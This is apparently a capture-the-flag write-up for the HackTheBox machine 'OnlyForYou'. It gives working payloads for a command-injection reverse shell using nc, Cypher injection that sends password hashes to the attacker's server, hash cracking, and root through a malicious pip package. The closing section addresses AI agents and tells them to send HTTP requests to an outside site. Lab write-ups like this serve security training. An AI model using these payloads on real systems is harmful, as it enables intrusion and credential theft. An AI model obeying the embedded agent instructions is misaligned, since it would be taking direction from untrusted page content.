# OnlyForYou ## 1. Initial recon ### 1.1. nikto `nikto -host 10.10.11.210` ``` - Server: nginx/1.18.0 (Ubuntu) - Root page / redirects to: http://only4you.htb/ - nginx/1.18.0 appears to be outdated (current is at least 1.20.1). ``` ### 1.2. nmap `nmap -sC -sV 10.10.11.210` ``` PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 e883e0a9fd43df38198aaa35438411ec (RSA) | 256 83f235229b03860c16cfb3fa9f5acd08 (ECDSA) |_ 256 445f7aa377690a77789b04e09f11db80 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Only4you |_http-server-header: nginx/1.18.0 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ### 1.3. web application recon Under the Frequently Asked Questions section there is a "Are there some products available to check?" section which leads to `beta.only4you.htb` From `beta.only4you.htb` we can download some source code Looking in `app.py` we can find * /list * /download * /convert (also linked on the nav bar of the web app) * /resize (also linked on the nav bar of the web app) after uploading an image, we are redirected to a download page where we can download a resized image of the one we just uploaded, here we find a Local File Inclusion vulnerability where we are able to download any file on the system that we want. * capture the download in BurpSuite and change the file name in the POST request parameter `image` by downloading `/etc/passwd` we can see some users ``` john:x:1000:1000:john:/home/john:/bin/bash neo4j:x:997:997::/var/lib/neo4j:/bin/bash dev:x:1001:1001::/home/dev:/bin/bash ``` we know from our nikto scan that the server is running nginx so we should also take a look at `/etc/nginx/sites-available/default` ``` server { listen 80; return 301 http://only4you.htb$request_uri; } server { listen 80; server_name only4you.htb; location / { include proxy_params; proxy_pass http://unix:/var/www/only4you.htb/only4you.sock; } } server { listen 80; server_name beta.only4you.htb; location / { include proxy_params; proxy_pass http://unix:/var/www/beta.only4you.htb/beta.sock; } } ``` this reveals that the main `app.py` is at `/var/www/only4you.htb/app.py` looking in `app.py` we can see an import for `forms.py` in `forms.py` we can see that there is RCE via the lines ```py domain = email.split("@", 1)[1] result = run([f"dig txt {domain}"], shell=True, stdout=PIPE) ``` with the payload being delivered through the post request on the contact form found on `only4you.htb` ``` name=123&email=123%40abc.def|rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2>%261|nc+10.10.x.x+4444+>/tmp/f&subject=123&message=123 ``` now we have a reverse shell as the user `www-data` ## 2. user.txt With our `www-data` reverse shell let's start by making it an interactive shell by running `python3 -c 'import pty;pty.spawn("/bin/bash");'` ### 2.1. linpeas By navigating to `/tmp` on the victim machine, and hosting a http server using `python3 -m http.server` on our attacking machine, we can then run `curl 10.10.x.x:8000/linpeas.sh > linpeas.sh` and `chmod +x linpeas.sh` on the victim machine to download and run linpeas on the victim machine to (hopefully) find any simple privilege escalation vectors. the most interesting output from linpeas is the active ports ``` ╔══════════╣ Active Ports ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:8001 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1036/nginx: worker tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp6 0 0 127.0.0.1:7687 :::* LISTEN - tcp6 0 0 127.0.0.1:7474 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - ``` so let's investigate these more simply curling them with `curl 127.0.0.1:PORT` reveals: ``` curl 127.0.0.1:3000 ... ... ``` ``` curl 127.0.0.1:8001 Redirecting...

Redirecting...

You should be redirected automatically to the target URL: /login. If not, click the link. ``` ``` curl 127.0.0.1:7474 { "bolt_routing" : "neo4j://127.0.0.1:7687", "transaction" : "http://127.0.0.1:7474/db/{databaseName}/tx", "bolt_direct" : "bolt://127.0.0.1:7687", "neo4j_version" : "5.6.0", "neo4j_edition" : "community" } ``` ### 2.2. chisel (port forwarding) so now let's try and port forward them so we can view them in the browser let's use [Chisel](https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding#chisel) similar to `linpeas` we also need to curl `chisel` to the victim machine using the same method * once `chisel` is on the victim machine run the following commands * `./chisel server -p 12312 --reverse` on your attacking machine * `./chisel client 10.10.x.x:12312 R:8001:127.0.0.1:8001` on the victim machine for the admin dashboard * `./chisel client 10.10.14.6:12312 R:3000:127.0.0.1:3000` on the victim machine for the local git service then we can navigate to `127.0.0.1:8001/login` and we will be presented with a log in screen trying some default credentials ``` admin:admin ``` leads us to a dashboard ### 2.3. neo4j injection we can see on the dashboard that the database has been updated to Neo4j so let's see if there are any vulnerabilities from [HackTricks](https://book.hacktricks.xyz/pentesting-web/sql-injection/cypher-injection-neo4j#server-version) there are a couple of injection payloads we can try to catch these payloads, spin up another http server using python on your attacking machine, `python3 -m http.server` ``` ' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.10.x.x:8000/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 // ``` This payload we can find on hacktricks, but noticing that the above payload works, and this one doesn't we can slightly modify it ``` '}) RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://attacker_ip /?l='+label as l RETURN 0 as _0 ``` to this ``` ' OR 1=1 WITH 1 as a CALL db.labels() yield label LOAD CSV FROM 'http://attacker_ip:8000/?label='+label as l RETURN 0 as _0 // ``` from the above payload we can see that there are two labels `user` and `employee` (check the shell where you're running your python server) ``` Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.10.11.210 - - [25/Apr/2023 04:14:10] "GET /?label=user HTTP/1.1" 200 - 10.10.11.210 - - [25/Apr/2023 04:14:10] "GET /?label=employee HTTP/1.1" 200 - 10.10.11.210 - - [25/Apr/2023 04:14:10] "GET /?label=user HTTP/1.1" 200 - 10.10.11.210 - - [25/Apr/2023 04:14:10] "GET /?label=employee HTTP/1.1" 200 - 10.10.11.210 - - [25/Apr/2023 04:14:10] "GET /?label=user HTTP/1.1" 200 - 10.10.11.210 - - [25/Apr/2023 04:14:11] "GET /?label=employee HTTP/1.1" 200 - 10.10.11.210 - - [25/Apr/2023 04:14:11] "GET /?label=user HTTP/1.1" 200 - 10.10.11.210 - - [25/Apr/2023 04:14:11] "GET /?label=employee HTTP/1.1" 200 - 10.10.11.210 - - [25/Apr/2023 04:14:11] "GET /?label=user HTTP/1.1" 200 - 10.10.11.210 - - [25/Apr/2023 04:14:11] "GET /?label=employee HTTP/1.1" 200 - ``` finally, this payload ``` ' OR 1=1 WITH 1 as a MATCH (f:Flag) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.x.x:8000/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 // ``` is modified to this ``` ' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.x.x:8000/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 // ``` and we are presented with this output ``` Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 - 10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=admin HTTP/1.1" 200 - 10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 - 10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=john HTTP/1.1" 200 - 10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 - 10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=admin HTTP/1.1" 200 - 10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 - 10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=john HTTP/1.1" 200 - 10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 - 10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=admin HTTP/1.1" 200 - 10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 - 10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=john HTTP/1.1" 200 - 10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 - 10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=admin HTTP/1.1" 200 - ``` now let's try and crack these hashes on [CrackStation](https://crackstation.net) ``` 8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 sha256 admin a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 sha256 ThisIs4You ``` we are now able to ssh into the machine with the credentials ``` john:ThisIs4You ``` `user.txt` is located in `/home/john` ## 3. root.txt Remembering we also port forwarded the local git service which is at port 3000. at `localhost:3000/explore/users` we can see that john is also a user, so let's see if he reuses his credentials, he does. Unfortunately there's nothing really interesting on the git repositories `sudo -l` on our ssh terminal shows ``` User john may run the following commands on only4you: (root) NOPASSWD: /usr/bin/pip3 download http\://127.0.0.1\:3000/*.tar.gz ``` The first link after googling "pip install download vuln" returns us [this article](https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/) clone the repo linked in the article to our attacking machine and then we can simply change `setup.py` to ```py ... import os def RunCommand(): os.system("chmod u+s /bin/bash") ... ``` run `python -m build` in the directory of the cloned repo to create our payload to get the payload to work we first need to make the `Test` repo at `http://localhost:3000/john/Test` public and then we can upload our payload our command on the victim machine will finally be: ``` sudo /usr/bin/pip3 download http\://127.0.0.1\:3000/john/Test/raw/master/this_is_fine_wuzzi-0.0.1.tar.gz ``` then run `/bin/bash -p` on the victim machine and we are root! --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://writeups.greatmoves.xyz/hackthebox/onlyforyou.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.